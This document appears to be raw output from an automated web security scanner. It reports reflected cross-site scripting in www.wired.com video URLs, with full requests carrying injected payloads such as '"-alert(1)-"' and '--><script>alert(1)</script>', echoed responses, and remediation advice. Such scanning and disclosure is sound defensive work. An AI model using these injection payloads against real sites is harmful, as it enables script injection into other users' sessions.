Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/181581663365d68"-alert(1)-"8f64e6fcf0e/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:29 GMT Date: Mon, 22 Nov 2010 00:44:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9277e"-alert(1)-"0623ce045a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam9277e"-alert(1)-"0623ce045a/653193147001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=286 Expires: Mon, 22 Nov 2010 00:49:46 GMT Date: Mon, 22 Nov 2010 00:45:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106759
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ff16"-alert(1)-"ae3d5100f07 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/6531931470014ff16"-alert(1)-"ae3d5100f07 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=297 Expires: Mon, 22 Nov 2010 00:50:06 GMT Date: Mon, 22 Nov 2010 00:45:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0e7f"><a>a8a93c134d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videod0e7f"><a>a8a93c134d1/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29426 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:39:32 GMT Date: Mon, 22 Nov 2010 00:34:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videod0e7f"><a>a8a93c134d1 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 42deb--><script>alert(1)</script>ae5daa4176f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video42deb--><script>alert(1)</script>ae5daa4176f/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29465 Vary: Accept-Encoding Cache-Control: max-age=272 Expires: Mon, 22 Nov 2010 00:40:28 GMT Date: Mon, 22 Nov 2010 00:35:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video42deb--><script>alert(1)</script>ae5daa4176f/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4da85"-alert(1)-"6a6abf3762a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos4da85"-alert(1)-"6a6abf3762a/latest/1815816633/wearable-computers-for-soldiers/660701101001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:32 GMT Date: Mon, 22 Nov 2010 00:36:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106715
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8948d"><a>bc9e08a046d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos8948d"><a>bc9e08a046d/latest/1815816633/wearable-computers-for-soldiers/660701101001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:40:58 GMT Date: Mon, 22 Nov 2010 00:35:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos8948d"><a>bc9e08a046d c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43ccc"-alert(1)-"4125b11533d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest43ccc"-alert(1)-"4125b11533d/1815816633/wearable-computers-for-soldiers/660701101001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:32 GMT Date: Mon, 22 Nov 2010 00:37:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106779
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63b69"><a>216cf93e556 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest63b69"><a>216cf93e556/1815816633/wearable-computers-for-soldiers/660701101001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:38 GMT Date: Mon, 22 Nov 2010 00:36:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106792
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest63b69"><a>216cf93e556"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 462c0"-alert(1)-"79cf4379b85 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633462c0"-alert(1)-"79cf4379b85/wearable-computers-for-soldiers/660701101001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:50 GMT Date: Mon, 22 Nov 2010 00:37:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eaac9"-alert(1)-"b17cb971a9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/wearable-computers-for-soldierseaac9"-alert(1)-"b17cb971a9/660701101001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=285 Expires: Mon, 22 Nov 2010 00:42:49 GMT Date: Mon, 22 Nov 2010 00:38:04 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106757
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba772"-alert(1)-"71ceb5bac16 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001ba772"-alert(1)-"71ceb5bac16 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=297 Expires: Mon, 22 Nov 2010 00:43:13 GMT Date: Mon, 22 Nov 2010 00:38:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106778
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f261d"><a>7a7c8bf4dcb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videof261d"><a>7a7c8bf4dcb/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29472 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:58:31 GMT Date: Mon, 22 Nov 2010 00:53:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videof261d"><a>7a7c8bf4dcb ss_making-the-soundtrack-harry-potter-and-the-deathly-hallows c_653378922001"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 6728f--><script>alert(1)</script>9c8c6ac13b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video6728f--><script>alert(1)</script>9c8c6ac13b3/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29505 Vary: Accept-Encoding Cache-Control: max-age=280 Expires: Mon, 22 Nov 2010 00:58:56 GMT Date: Mon, 22 Nov 2010 00:54:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video6728f--><script>alert(1)</script>9c8c6ac13b3/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62e15"-alert(1)-"0a8696b2140 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/making-the-soundtrack-harry-potter-and-the-deathly-hallows62e15"-alert(1)-"0a8696b2140/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=298 Expires: Mon, 22 Nov 2010 01:00:19 GMT Date: Mon, 22 Nov 2010 00:55:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106819
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44987"><a>042fad4950 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/making-the-soundtrack-harry-potter-and-the-deathly-hallows44987"><a>042fad4950/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:20 GMT Date: Mon, 22 Nov 2010 00:54:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106785
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_making-the-soundtrack-harry-potter-and-the-deathly-hallows44987"><a>042fad4950 c_653378922001"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 670ef"-alert(1)-"59cf895c586 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001670ef"-alert(1)-"59cf895c586 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=273 Expires: Mon, 22 Nov 2010 01:00:53 GMT Date: Mon, 22 Nov 2010 00:56:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106816
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a470f"><a>013bdc7dab4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
